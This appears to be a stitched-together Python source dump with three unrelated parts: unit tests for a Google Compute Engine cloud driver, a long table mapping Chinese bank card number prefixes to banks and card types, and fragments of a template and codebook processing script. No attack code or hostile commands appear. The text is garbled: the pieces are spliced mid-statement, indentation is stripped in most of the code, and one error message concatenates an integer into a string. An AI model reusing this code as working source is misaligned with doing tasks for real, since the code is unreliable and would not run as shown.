full_list = [item.name for item in list_fn()]
li = d.ex_list(list_fn)
iter_list = [item.name for sublist in li for item in sublist]
self.assertEqual(full_list, iter_list)
# Test paging & filtering with a single list function as they require
# additional test fixtures
list_fn = d.ex_list_regions
for count, sublist in zip((2, 1), d.ex_list(list_fn).page(2)):
self.assertTrue(len(sublist) == count)
for sublist in d.ex_list(list_fn).filter('name eq us-central1'):
self.assertTrue(len(sublist) == 1)
self.assertEqual(sublist[0].name, 'us-central1')
def test_ex_list_addresses(self):
address_list = self.driver.ex_list_addresses()
address_list_all = self.driver.ex_list_addresses('all')
address_list_uc1 = self.driver.ex_list_addresses('us-central1')
address_list_global = self.driver.ex_list_addresses('global')
self.assertEqual(len(address_list), 2)
self.assertEqual(len(address_list_all), 5)
self.assertEqual(len(address_list_global), 1)
self.assertEqual(address_list[0].name, 'libcloud-demo-address')
self.assertEqual(address_list_uc1[0].name, 'libcloud-demo-address')
self.assertEqual(address_list_global[0].name, 'lcaddressglobal')
names = [a.name for a in address_list_all]
self.assertTrue('libcloud-demo-address' in names)
def test_ex_list_backendservices(self):
self.backendservices_mock = 'empty'
backendservices_list = self.driver.ex_list_backendservices()
self.assertListEqual(backendservices_list, [])
self.backendservices_mock = 'web-service'
backendservices_list = self.driver.ex_list_backendservices()
web_service = backendservices_list[0]
self.assertEqual(web_service.name, 'web-service')
self.assertEqual(len(web_service.healthchecks), 1)
self.assertEqual(len(web_service.backends), 2)
def test_ex_list_healthchecks(self):
healthchecks = self.driver.ex_list_healthchecks()
self.assertEqual(len(healthchecks), 3)
self.assertEqual(healthchecks[0].name, 'basic-check')
def test_ex_list_firewalls(self):
firewalls = self.driver.ex_list_firewalls()
self.assertEqual(len(firewalls), 5)
self.assertEqual(firewalls[0].name, 'default-allow-internal')
def test_ex_list_forwarding_rules(self):
forwarding_rules = self.driver.ex_list_forwarding_rules()
forwarding_rules_all = self.driver.ex_list_forwarding_rules('all')
forwarding_rules_uc1 = self.driver.ex_list_forwarding_rules(
'us-central1')
self.assertEqual(len(forwarding_rules), 2)
self.assertEqual(len(forwarding_rules_all), 2)
self.assertEqual(forwarding_rules[0].name, 'lcforwardingrule')
self.assertEqual(forwarding_rules_uc1[0].name, 'lcforwardingrule')
names = [f.name for f in forwarding_rules_all]
self.assertTrue('lcforwardingrule' in names)
def test_ex_list_forwarding_rules_global(self):
forwarding_rules = self.driver.ex_list_forwarding_rules(
global_rules=True)
self.assertEqual(len(forwarding_rules), 2)
self.assertEqual(forwarding_rules[0].name, 'http-rule')
names = [f.name for f in forwarding_rules]
self.assertListEqual(names, ['http-rule', 'http-rule2'])
def test_list_images(self):
local_images = self.driver.list_images()
all_deprecated_images = self.driver.list_images(
ex_include_deprecated=True)
debian_images = self.driver.list_images(ex_project='debian-cloud')
local_plus_deb = self.driver.list_images(
['debian-cloud', 'project_name'])
self.assertEqual(len(local_images), 50)
self.assertEqual(len(all_deprecated_images), 178)
self.assertEqual(len(debian_images), 2)
self.assertEqual(len(local_plus_deb), 4)
self.assertEqual(local_images[0].name, 'custom-image')
self.assertEqual(debian_images[1].name, 'debian-7-wheezy-v20131120')
def test_ex_destroy_instancegroup(self):
name = 'myname'
zone = 'us-central1-a'
uig = self.driver.ex_get_instancegroup(name, zone)
self.assertTrue(self.driver.ex_destroy_instancegroup(uig))
def test_ex_get_instancegroup(self):
name = 'myname'
loc = 'us-central1-a'
actual = self.driver.ex_get_instancegroup(name, loc)
self.assertEqual(actual.name, name)
self.assertEqual(actual.zone.name, loc)
def test_ex_create_instancegroup(self):
name = 'myname'
loc = 'us-central1-a'
actual = self.driver.ex_create_instancegroup(name, loc)
self.assertEqual(actual.name, name)
self.assertEqual(actual.zone.name, loc)
def test_ex_list_instancegroups(self):
loc = 'us-central1-a'
actual = self.driver.ex_list_instancegroups(loc)
self.assertTrue(len(actual) == 2)
self.assertEqual(actual[0].name, 'myname')
self.assertEqual(actual[1].name, 'myname2')
def test_ex_list_instancegroups_zone_attribute_not_present_in_response(self):
GCEMockHttp.type = 'zone_attribute_not_present'
loc = 'us-central1-a'
actual = self.driver.ex_list_instancegroups(loc)
self.assertTrue(len(actual) == 2)
self.assertEqual(actual[0].name, 'myname')
self.assertEqual(actual[1].name, 'myname2')
def test_ex_instancegroup_list_instances(self):
name = 'myname'
loc = 'us-central1-a'
gceobj = self.driver.ex_get_instancegroup(name, loc)
actual = self.driver.ex_instancegroup_list_instances(gceobj)
self.assertTrue(len(actual) == 2)
for node in actual:
self.assertTrue(isinstance(node, Node))
self.assertEqual(loc, node.extra['zone'].name)
def test_ex_instancegroup_add_instances(self):
name = 'myname'
loc = 'us-central1-a'
gceobj = self.driver.ex_get_instancegroup(name, loc)
node_name = self.driver.ex_get_node('node-name', loc)
lcnode = self.driver.ex_get_node('lcnode-001', loc)
node_list = [node_name, lcnode]
self.assertTrue(
self.driver.ex_instancegroup_add_instances(gceobj, node_list))
def test_ex_instancegroup_remove_instances(self):
name = 'myname'
loc = 'us-central1-a'
gceobj = self.driver.ex_get_instancegroup(name, loc)
node_name = self.driver.ex_get_node('node-name', loc)
lcnode = self.driver.ex_get_node('lcnode-001', loc)
node_list = [node_name, lcnode]
self.assertTrue(
self.driver.ex_instancegroup_remove_instances(gceobj, node_list))
def test_ex_instancegroup_set_named_ports(self):
name = 'myname'
loc = 'us-central1-a'
gceobj = self.driver.ex_get_instancegroup(name, loc)
named_ports = [{'name': 'foo', 'port': 4444}]
# base case
self.assertTrue(
self.driver.ex_instancegroup_set_named_ports(gceobj, named_ports))
# specify nothing, default is empty list
self.assertTrue(self.driver.ex_instancegroup_set_named_ports(gceobj))
# specify empty list
self.assertTrue(
self.driver.ex_instancegroup_set_named_ports(gceobj, []))
# raise ValueError if string is passed
'453242' : u'建设银行-VISA准贷记卡(银联卡)-准贷记卡',
'491031' : u'建设银行-VISA准贷记金卡-准贷记卡',
'524094' : u'建设银行-乐当家-借记卡',
'526410' : u'建设银行-乐当家-借记卡',
'53242' : u'建设银行-MASTER准贷记卡-准贷记卡',
'53243' : u'建设银行-乐当家-准贷记卡',
'544033' : u'建设银行-准贷记金卡-准贷记卡',
'552245' : u'建设银行-乐当家白金卡-借记卡',
'589970' : u'建设银行-金融复合IC卡-借记卡',
'620060' : u'建设银行-银联标准卡-借记卡',
'621080' : u'建设银行-银联理财钻石卡-借记卡',
'621081' : u'建设银行-金融IC卡-借记卡',
'621466' : u'建设银行-理财白金卡-借记卡',
'621467' : u'建设银行-社保IC卡-借记卡',
'621488' : u'建设银行-财富卡私人银行卡-借记卡',
'621499' : u'建设银行-理财金卡-借记卡',
'621598' : u'建设银行-福农卡-借记卡',
'621621' : u'建设银行-武警军人保障卡-借记卡',
'621700' : u'建设银行-龙卡通-借记卡',
'622280' : u'建设银行-银联储蓄卡-借记卡',
'622700' : u'建设银行-龙卡储蓄卡(银联卡)-借记卡',
'622707' : u'建设银行-准贷记卡-准贷记卡',
'622966' : u'建设银行-理财白金卡-借记卡',
'622988' : u'建设银行-理财金卡-借记卡',
'625955' : u'建设银行-准贷记卡普卡-准贷记卡',
'625956' : u'建设银行-准贷记卡金卡-准贷记卡',
'553242' : u'建设银行-龙卡信用卡-贷记卡',
'621082' : u'建设银行-建行陆港通龙卡-借记卡',
'621673' : u'中国建设银行-普通高中学生资助卡-借记卡',
'623211' : u'中国建设银行-中国旅游卡-借记卡',
'436742193' : u'建行厦门分行-龙卡储蓄卡-借记卡',
'622280193' : u'建行厦门分行-银联储蓄卡-借记卡',
'356896' : u'中国建设银行-龙卡JCB金卡-贷记卡',
'356899' : u'中国建设银行-龙卡JCB白金卡-贷记卡',
'356895' : u'中国建设银行-龙卡JCB普卡-贷记卡',
'436718' : u'中国建设银行-龙卡贷记卡公司卡-贷记卡',
'436738' : u'中国建设银行-龙卡贷记卡-贷记卡',
'436745' : u'中国建设银行-龙卡国际普通卡VISA-贷记卡',
'436748' : u'中国建设银行-龙卡国际金卡VISA-贷记卡',
'489592' : u'中国建设银行-VISA白金信用卡-贷记卡',
'531693' : u'中国建设银行-龙卡国际白金卡-贷记卡',
'532450' : u'中国建设银行-龙卡国际普通卡MASTER-贷记卡',
'532458' : u'中国建设银行-龙卡国际金卡MASTER-贷记卡',
'544887' : u'中国建设银行-龙卡万事达金卡-贷记卡',
'552801' : u'中国建设银行-龙卡贷记卡-贷记卡',
'557080' : u'中国建设银行-龙卡万事达白金卡-贷记卡',
'558895' : u'中国建设银行-龙卡贷记卡-贷记卡',
'559051' : u'中国建设银行-龙卡万事达信用卡-贷记卡',
'622166' : u'中国建设银行-龙卡人民币信用卡-贷记卡',
'622168' : u'中国建设银行-龙卡人民币信用金卡-贷记卡',
'622708' : u'中国建设银行-龙卡人民币白金卡-贷记卡',
'625964' : u'中国建设银行-龙卡IC信用卡普卡-贷记卡',
'625965' : u'中国建设银行-龙卡IC信用卡金卡-贷记卡',
'625966' : u'中国建设银行-龙卡IC信用卡白金卡-贷记卡',
'628266' : u'中国建设银行-龙卡银联公务卡普卡-贷记卡',
'628366' : u'中国建设银行-龙卡银联公务卡金卡-贷记卡',
'625362' : u'中国建设银行-中国旅游卡-贷记卡',
'625363' : u'中国建设银行-中国旅游卡-贷记卡',
'628316' : u'中国建设银行-龙卡IC公务卡-贷记卡',
'628317' : u'中国建设银行-龙卡IC公务卡-贷记卡',
'620021' : u'交通银行-交行预付卡-预付费卡',
'620521' : u'交通银行-世博预付IC卡-预付费卡',
'00405512' : u'交通银行-太平洋互连卡-借记卡',
'0049104' : u'交通银行-太平洋信用卡-贷记卡',
'0053783' : u'交通银行-太平洋信用卡-贷记卡',
'00601428' : u'交通银行-太平洋万事顺卡-借记卡',
'405512' : u'交通银行-太平洋互连卡(银联卡)-借记卡',
'434910' : u'交通银行-太平洋白金信用卡-贷记卡',
'458123' : u'交通银行-太平洋双币贷记卡-贷记卡',
'458124' : u'交通银行-太平洋双币贷记卡-贷记卡',
'49104' : u'交通银行-太平洋信用卡-贷记卡',
'520169' : u'交通银行-太平洋双币贷记卡-贷记卡',
'522964' : u'交通银行-太平洋白金信用卡-贷记卡',
'53783' : u'交通银行-太平洋信用卡-贷记卡',
'552853' : u'交通银行-太平洋双币贷记卡-贷记卡',
'601428' : u'交通银行-太平洋万事顺卡-借记卡',
'622250' : u'交通银行-太平洋人民币贷记卡-贷记卡',
'622251' : u'交通银行-太平洋人民币贷记卡-贷记卡',
'521899' : u'交通银行-太平洋双币贷记卡-贷记卡',
'622254' : u'交通银行-太平洋准贷记卡-准贷记卡',
'622255' : u'交通银行-太平洋准贷记卡-准贷记卡',
'622256' : u'交通银行-太平洋准贷记卡-准贷记卡',
'622257' : u'交通银行-太平洋准贷记卡-准贷记卡',
'622258' : u'交通银行-太平洋借记卡-借记卡',
'622259' : u'交通银行-太平洋借记卡-借记卡',
'622253' : u'交通银行-太平洋人民币贷记卡-贷记卡',
'622261' : u'交通银行-太平洋借记卡-借记卡',
'622284' : u'交通银行-太平洋MORE卡-准贷记卡',
'622656' : u'交通银行-白金卡-贷记卡',
'628216' : u'交通银行-交通银行公务卡普卡-贷记卡',
'622252' : u'交通银行-太平洋人民币贷记卡-贷记卡',
'66405512' : u'交通银行-太平洋互连卡-借记卡',
'6649104' : u'交通银行-太平洋信用卡-贷记卡',
'622260' : u'交通银行-太平洋借记卡-借记卡',
'66601428' : u'交通银行-太平洋万事顺卡-借记卡',
'955590' : u'交通银行-太平洋贷记卡(银联卡)-贷记卡',
'955591' : u'交通银行-太平洋贷记卡(银联卡)-贷记卡',
'955592' : u'交通银行-太平洋贷记卡(银联卡)-贷记卡',
'955593' : u'交通银行-太平洋贷记卡(银联卡)-贷记卡',
'6653783' : u'交通银行-太平洋信用卡-贷记卡',
'628218' : u'交通银行-交通银行公务卡金卡-贷记卡',
'622262' : u'交通银行-交银IC卡-借记卡',
'621069' : u'交通银行香港分行-交通银行港币借记卡-借记卡',
'620013' : u'交通银行香港分行-港币礼物卡-借记卡',
'625028' : u'交通银行香港分行-双币种信用卡-贷记卡',
'625029' : u'交通银行香港分行-双币种信用卡-贷记卡',
'621436' : u'交通银行香港分行-双币卡-借记卡',
'621002' : u'交通银行香港分行-银联人民币卡-借记卡',
'621335' : u'交通银行澳门分行-银联借记卡-借记卡',
'433670' : u'中信银行-中信借记卡-借记卡',
'433680' : u'中信银行-中信借记卡-借记卡',
'442729' : u'中信银行-中信国际借记卡-借记卡',
'442730' : u'中信银行-中信国际借记卡-借记卡',
'620082' : u'中信银行-中国旅行卡-借记卡',
'622690' : u'中信银行-中信借记卡(银联卡)-借记卡',
'622691' : u'中信银行-中信借记卡(银联卡)-借记卡',
'622692' : u'中信银行-中信贵宾卡(银联卡)-借记卡',
'622696' : u'中信银行-中信理财宝金卡-借记卡',
'622698' : u'中信银行-中信理财宝白金卡-借记卡',
'622998' : u'中信银行-中信钻石卡-借记卡',
'622999' : u'中信银行-中信钻石卡-借记卡',
'433671' : u'中信银行-中信借记卡-借记卡',
'968807' : u'中信银行-中信理财宝(银联卡)-借记卡',
'968808' : u'中信银行-中信理财宝(银联卡)-借记卡',
'968809' : u'中信银行-中信理财宝(银联卡)-借记卡',
'621771' : u'中信银行-借记卡-借记卡',
'621767' : u'中信银行-理财宝IC卡-借记卡',
'621768' : u'中信银行-理财宝IC卡-借记卡',
'621770' : u'中信银行-理财宝IC卡-借记卡',
'621772' : u'中信银行-理财宝IC卡-借记卡',
'621773' : u'中信银行-理财宝IC卡-借记卡',
'620527' : u'中信银行-主账户复合电子现金卡-借记卡',
'303' : u'光大银行-阳光卡-借记卡',
'356837' : u'光大银行-阳光商旅信用卡-贷记卡',
'356838' : u'光大银行-阳光商旅信用卡-贷记卡',
'486497' : u'光大银行-阳光商旅信用卡-贷记卡',
'622660' : u'光大银行-阳光卡(银联卡)-借记卡',
'622662' : u'光大银行-阳光卡(银联卡)-借记卡',
'622663' : u'光大银行-阳光卡(银联卡)-借记卡',
'622664' : u'光大银行-阳光卡(银联卡)-借记卡',
'622665' : u'光大银行-阳光卡(银联卡)-借记卡',
'622666' : u'光大银行-阳光卡(银联卡)-借记卡',
'622667' : u'光大银行-阳光卡(银联卡)-借记卡',
'622669' : u'光大银行-阳光卡(银联卡)-借记卡',
'622670' : u'光大银行-阳光卡(银联卡)-借记卡',
'622671' : u'光大银行-阳光卡(银联卡)-借记卡',
'622672' : u'光大银行-阳光卡(银联卡)-借记卡',
'622668' : u'光大银行-阳光卡(银联卡)-借记卡',
'622661' : u'光大银行-阳光卡(银联卡)-借记卡',
'622674' : u'光大银行-阳光卡(银联卡)-借记卡',
'90030' : u'光大银行-阳光卡(银联卡)-借记卡',
'622673' : u'光大银行-阳光卡(银联卡)-借记卡',
'620518' : u'光大银行-借记卡普卡-借记卡',
'621489' : u'光大银行-社会保障IC卡-借记卡',
'621492' : u'光大银行-IC借记卡普卡-借记卡',
'620535' : u'光大银行-手机支付卡-借记卡',
'623156' : u'光大银行-联名IC卡普卡-借记卡',
'621490' : u'光大银行-借记IC卡白金卡-借记卡',
'621491' : u'光大银行-借记IC卡金卡-借记卡',
'620085' : u'光大银行-阳光旅行卡-借记卡',
'623155' : u'光大银行-借记IC卡钻石卡-借记卡',
'623157' : u'光大银行-联名IC卡金卡-借记卡',
'623158' : u'光大银行-联名IC卡白金卡-借记卡',
'623159' : u'光大银行-联名IC卡钻石卡-借记卡',
'999999' : u'华夏银行-华夏卡(银联卡)-借记卡',
'621222' : u'华夏银行-华夏白金卡-借记卡',
'623020' : u'华夏银行-华夏普卡-借记卡',
'623021' : u'华夏银行-华夏金卡-借记卡',
'623022' : u'华夏银行-华夏白金卡-借记卡',
'623023' : u'华夏银行-华夏钻石卡-借记卡',
'622630' : u'华夏银行-华夏卡(银联卡)-借记卡',
'622631' : u'华夏银行-华夏至尊金卡(银联卡)-借记卡',
'622632' : u'华夏银行-华夏丽人卡(银联卡)-借记卡',
'622633' : u'华夏银行-华夏万通卡-借记卡',
'622615' : u'民生银行-民生借记卡(银联卡)-借记卡',
'622616' : u'民生银行-民生银联借记卡-金卡-借记卡',
'622618' : u'民生银行-钻石卡-借记卡',
'622622' : u'民生银行-民生借记卡(银联卡)-借记卡',
'622617' : u'民生银行-民生借记卡(银联卡)-借记卡',
'622619' : u'民生银行-民生借记卡(银联卡)-借记卡',
'415599' : u'民生银行-民生借记卡-借记卡',
'421393' : u'民生银行-民生国际卡-借记卡',
'421865' : u'民生银行-民生国际卡(银卡)-借记卡',
'427570' : u'民生银行-民生国际卡(欧元卡)-借记卡',
'427571' : u'民生银行-民生国际卡(澳元卡)-借记卡',
'472067' : u'民生银行-民生国际卡-借记卡',
'472068' : u'民生银行-民生国际卡-借记卡',
'622620' : u'民生银行-薪资理财卡-借记卡',
'621691' : u'民生银行-借记卡普卡-借记卡',
'545392' : u'民生银行-民生MasterCard-贷记卡',
'545393' : u'民生银行-民生MasterCard-贷记卡',
'545431' : u'民生银行-民生MasterCard-贷记卡',
'545447' : u'民生银行-民生MasterCard-贷记卡',
'356859' : u'民生银行-民生JCB信用卡-贷记卡',
'356857' : u'民生银行-民生JCB金卡-贷记卡',
'407405' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'421869' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'421870' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'421871' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'512466' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'356856' : u'民生银行-民生JCB普卡-贷记卡',
'528948' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'552288' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'622600' : u'民生银行-民生信用卡(银联卡)-贷记卡',
'622601' : u'民生银行-民生信用卡(银联卡)-贷记卡',
'622602' : u'民生银行-民生银联白金信用卡-贷记卡',
'517636' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'622621' : u'民生银行-民生银联个人白金卡-贷记卡',
'628258' : u'民生银行-公务卡金卡-贷记卡',
'556610' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'622603' : u'民生银行-民生银联商务信用卡-贷记卡',
'464580' : u'民生银行-民VISA无限卡-贷记卡',
'464581' : u'民生银行-民生VISA商务白金卡-贷记卡',
'523952' : u'民生银行-民生万事达钛金卡-贷记卡',
'545217' : u'民生银行-民生万事达世界卡-贷记卡',
'553161' : u'民生银行-民生万事达白金公务卡-贷记卡',
'356858' : u'民生银行-民生JCB白金卡-贷记卡',
'622623' : u'民生银行-银联标准金卡-贷记卡',
'625911' : u'民生银行-银联芯片普卡-贷记卡',
'377152' : u'民生银行-民生运通双币信用卡普卡-贷记卡',
'377153' : u'民生银行-民生运通双币信用卡金卡-贷记卡',
'377158' : u'民生银行-民生运通双币信用卡钻石卡-贷记卡',
'377155' : u'民生银行-民生运通双币标准信用卡白金卡-贷记卡',
'625912' : u'民生银行-银联芯片金卡-贷记卡',
'625913' : u'民生银行-银联芯片白金卡-贷记卡',
'406365' : u'广发银行股份有限公司-广发VISA信用卡-贷记卡',
'406366' : u'广发银行股份有限公司-广发VISA信用卡-贷记卡',
'428911' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'436768' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'436769' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'487013' : u'广发银行股份有限公司-广发VISA信用卡-贷记卡',
'491032' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'491034' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'491035' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'491036' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'491037' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'491038' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'518364' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'520152' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'520382' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'548844' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'552794' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'622555' : u'广发银行股份有限公司-广发银联标准金卡-贷记卡',
'622556' : u'广发银行股份有限公司-广发银联标准普卡-贷记卡',
'622557' : u'广发银行股份有限公司-广发银联标准真情金卡-贷记卡',
'622558' : u'广发银行股份有限公司-广发银联标准白金卡-贷记卡',
'622559' : u'广发银行股份有限公司-广发银联标准真情普卡-贷记卡',
'622560' : u'广发银行股份有限公司-广发真情白金卡-贷记卡',
'622568' : u'广发银行股份有限公司-广发理财通卡-借记卡',
'528931' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'9111' : u'广发银行股份有限公司-广发理财通(银联卡)-借记卡',
'558894' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'625072' : u'广发银行股份有限公司-银联标准金卡-贷记卡',
'625071' : u'广发银行股份有限公司-银联标准普卡-贷记卡',
'628260' : u'广发银行股份有限公司-银联公务金卡-贷记卡',
'628259' : u'广发银行股份有限公司-银联公务普卡-贷记卡',
'621462' : u'广发银行股份有限公司-理财通卡-借记卡',
'625805' : u'广发银行股份有限公司-银联真情普卡-贷记卡',
'625806' : u'广发银行股份有限公司-银联真情金卡-贷记卡',
'625807' : u'广发银行股份有限公司-银联真情白金卡-贷记卡',
'625808' : u'广发银行股份有限公司-银联标准普卡-贷记卡',
'625809' : u'广发银行股份有限公司-银联标准金卡-贷记卡',
'625810' : u'广发银行股份有限公司-银联标准白金卡-贷记卡',
'685800' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'620037' : u'广发银行股份有限公司-广发青年银行预付卡-预付费卡',
'6858000' : u'广发银行股份有限公司-广发理财通-贷记卡',
'6858001' : u'广发银行股份有限公司-广发理财通-借记卡',
'6858009' : u'广发银行股份有限公司-广发理财通-借记卡',
'623506' : u'广发银行股份有限公司-广发财富管理多币IC卡-借记卡',
'412963' : u'平安银行(借记卡)-发展借记卡-借记卡',
'415752' : u'平安银行(借记卡)-国际借记卡-借记卡',
'415753' : u'平安银行(借记卡)-国际借记卡-借记卡',
'622535' : u'平安银行(借记卡)-聚财卡金卡-借记卡',
'622536' : u'平安银行(借记卡)-聚财卡VIP金卡-借记卡',
'622538' : u'平安银行(借记卡)-发展卡(银联卡)-借记卡',
'622539' : u'平安银行(借记卡)-聚财卡白金卡和钻石卡-借记卡',
'998800' : u'平安银行(借记卡)-发展借记卡(银联卡)-借记卡',
'412962' : u'平安银行(借记卡)-发展借记卡-借记卡',
'622983' : u'平安银行(借记卡)-聚财卡钻石卡-借记卡',
'620010' : u'平安银行(借记卡)-公益预付卡-预付费卡',
'356885' : u'招商银行-招商银行信用卡-贷记卡',
'356886' : u'招商银行-招商银行信用卡-贷记卡',
'356887' : u'招商银行-招商银行信用卡-贷记卡',
'356888' : u'招商银行-招商银行信用卡-贷记卡',
'356890' : u'招商银行-招商银行信用卡-贷记卡',
'402658' : u'招商银行-两地一卡通-借记卡',
'410062' : u'招商银行-招行国际卡(银联卡)-借记卡',
'439188' : u'招商银行-招商银行信用卡-贷记卡',
'439227' : u'招商银行-VISA商务信用卡-贷记卡',
'468203' : u'招商银行-招行国际卡(银联卡)-借记卡',
'479228' : u'招商银行-招商银行信用卡-贷记卡',
'479229' : u'招商银行-招商银行信用卡-贷记卡',
'512425' : u'招商银行-招行国际卡(银联卡)-借记卡',
'521302' : u'招商银行-世纪金花联名信用卡-贷记卡',
'524011' : u'招商银行-招行国际卡(银联卡)-借记卡',
'356889' : u'招商银行-招商银行信用卡-贷记卡',
'545620' : u'招商银行-万事达信用卡-贷记卡',
'545621' : u'招商银行-万事达信用卡-贷记卡',
'545947' : u'招商银行-万事达信用卡-贷记卡',
'545948' : u'招商银行-万事达信用卡-贷记卡',
'552534' : u'招商银行-招商银行信用卡-贷记卡',
'552587' : u'招商银行-招商银行信用卡-贷记卡',
'622575' : u'招商银行-招商银行信用卡-贷记卡',
'622576' : u'招商银行-招商银行信用卡-贷记卡',
'622577' : u'招商银行-招商银行信用卡-贷记卡',
'622579' : u'招商银行-招商银行信用卡-贷记卡',
'622580' : u'招商银行-一卡通(银联卡)-借记卡',
'545619' : u'招商银行-万事达信用卡-贷记卡',
'622581' : u'招商银行-招商银行信用卡-贷记卡',
'622582' : u'招商银行-招商银行信用卡-贷记卡',
'622588' : u'招商银行-一卡通(银联卡)-借记卡',
'622598' : u'招商银行-公司卡(银联卡)-借记卡',
'622609' : u'招商银行-金卡-借记卡',
'690755' : u'招商银行-招行一卡通-借记卡',
'95555' : u'招商银行-一卡通(银联卡)-借记卡',
'545623' : u'招商银行-万事达信用卡-贷记卡',
'621286' : u'招商银行-金葵花卡-借记卡',
'620520' : u'招商银行-电子现金卡-预付费卡',
'621483' : u'招商银行-银联IC普卡-借记卡',
'621485' : u'招商银行-银联IC金卡-借记卡',
| |
+ str(line_number) + ": " + inFile_strings[line_number] + " This program is scanning through each line in the template, and expects to find an ID as the second token on this line #" + str(i) + ": " + currentLine)
print("but there are only " + str(len(temp)) + " tokens on the line.")
return -48, '', ''
myLabel = temp[1]
myLabel_strings = myLabel.split('-')
if (len(myLabel_strings) > len(parentLabel_strings) and
(all([myLabel_strings[j] == parentLabel_strings[j] for j in range(len(parentLabel_strings))])) and
(myLabel_strings[len(parentLabel_strings)] > first_added_label_strings[len(parentLabel_strings)])):
myLabel_strings[len(parentLabel_strings)] = str(int(myLabel_strings[len(parentLabel_strings)]) + num_added_sections)
temp[1] = '-'.join(myLabel_strings)
inFile_strings[i] = ' '.join(temp) + "\n"
if (myText == "*dependent*"):
if (len(temp) < 5):
print("Error! While updating the file fragment '" + match_object.group(1) + "' for line #" + str(line_number) + ": " + inFile_strings[line_number] + " This program is scanning through each line in the template, and expects to find the ID of the master section as the fifth token on this line #" + i + ": " + currentLine)
print("but there are only " + len(temp) + " tokens on the line.")
return -49, '', ''
master = temp[4]
master_strings = master.split('-')
if (len(master_strings) > len(parentLabel_strings) and
(all([master_strings[j] == parentLabel_strings[j] for j in range(len(parentLabel_strings))])) and
(master_strings[len(parentLabel_strings)] > first_added_label_strings[len(parentLabel_strings)])):
master_strings[len(parentLabel_strings)] = str(int(master_strings[len(parentLabel_strings)]) + num_added_sections)
temp[4] = '-'.join(master_strings)
inFile_strings[i] = ' '.join(temp) + "\n"
else:
if ("%next%" in currentLine):
next_strings = currentLine.split('%')
for next_index in range(len(next_strings) - 1):
if (next_strings[next_index] == "next"):
myLabel = next_strings[next_index+1]
myLabel_strings = myLabel.split('-')
if (len(myLabel_strings) > len(parentLabel_strings) and
(all([myLabel_strings[j] == parentLabel_strings[j] for j in range(len(parentLabel_strings))])) and
(myLabel_strings[len(parentLabel_strings)] > first_added_label_strings[len(parentLabel_strings)])):
myLabel_strings[len(parentLabel_strings)] = str(int(myLabel_strings[len(parentLabel_strings)]) + num_added_sections)
next_strings[next_index+1] = '-'.join(myLabel_strings)
inFile_strings[i] = '%'.join(next_strings)
inFile_strings = inFile_strings[0:leaf_line_number] + fragment_strings + inFile_strings[(end_leaf_line_number+1):]
return 1, inFile_strings, num_fragments_replaced
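# A small, self-contained illustration (example values assumed, not part of the
# template format itself) of the label-renumbering step above: labels such as
# '3-2-4' are split on '-', and when a label lies under the parent label and past
# the first newly added sibling, that sibling-index component is shifted by the
# number of inserted sections.
def _shift_label(label, parent_label, first_added, num_added_sections):
    parts = label.split('-')
    parent = parent_label.split('-')
    if (len(parts) > len(parent)
            and parts[:len(parent)] == parent
            and parts[len(parent)] > first_added.split('-')[len(parent)]):  # string comparison, mirroring the code above
        parts[len(parent)] = str(int(parts[len(parent)]) + num_added_sections)
    return '-'.join(parts)
# _shift_label('3-5-1', parent_label='3', first_added='3-2', num_added_sections=2) -> '3-7-1'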
def printCodebookToTempFile(inFile):
"""
Prints the codebook to a temporary file.
"""
global globalOutputEncoding
try:
tempFile = tempfile.TemporaryFile('w+t', encoding=globalOutputEncoding)
except:
print("Error creating a temporary file to hold the codebook! Encoding is: ", globalOutputEncoding)
return -68, None
inFile.seek(0)
theLine = inFile.readline() #skip gui version
theLine = inFile.readline()
makeCodeBook = True
startString = "%start%"
endString = "%end%"
currentString = "%current%"
currentPlusIntervalString = "%currentPlusInterval%"
print("Parent Section\tLeaf\tText", file=tempFile)
lineNumber = 2
while theLine: #readline returns an empty string when it reaches EOF
currentLine = theLine
if logging: print(currentLine, end='')
temp = currentLine.rstrip('\n').split(" ")
if logging: print(temp)
if (len(temp)<2):
print("\nPortion of template (after inserting fragments), with line numbers:")
inFile.seek(0)
theLine = inFile.readline()
outputLineNumber = 1
while theLine:
if (outputLineNumber + 7 > lineNumber) and (lineNumber + 7 > outputLineNumber):
sys.stdout.write(str(outputLineNumber) + ":" + theLine)
theLine = inFile.readline()
outputLineNumber += 1
print("\nError! While reading through the template to print the codebook, the software expected a start tag (e.g., *random* 3-2 4) on line number " + str(lineNumber) + " (see print out with line numbers above) but got: "+currentLine)
print("Make sure the lines (in the template file) that contain start tags for Random and Constant and Dependent sections specify the correct number of subsections listed after the label (following the second space in the line), that each end tag is directly followed by either a start tag or an end tag, that there are no blank lines in the template file outside of Leaf sections, and that all fragments use the start/end tag texts '*leaf*' and '*end_leaf*' exactly and with no spaces on the same lines. Also look at the surrounding lines to see if a fragment does not have the correct text for a start/end tag.")
return -38, tempFile
myText = temp[0]
myLabel = temp[1]
if "*leaf*" in myText:
splitLabel = myLabel.split("-")
myParent = '-'.join(splitLabel[:-1])
parentString = "v" + myParent.replace("-", "_")
if (parentString == "v"): parentString = "-"
print(parentString + "\t" + splitLabel[-1] + "\t", file=tempFile, end='')
if logging: print("leaf text: \t", end='')
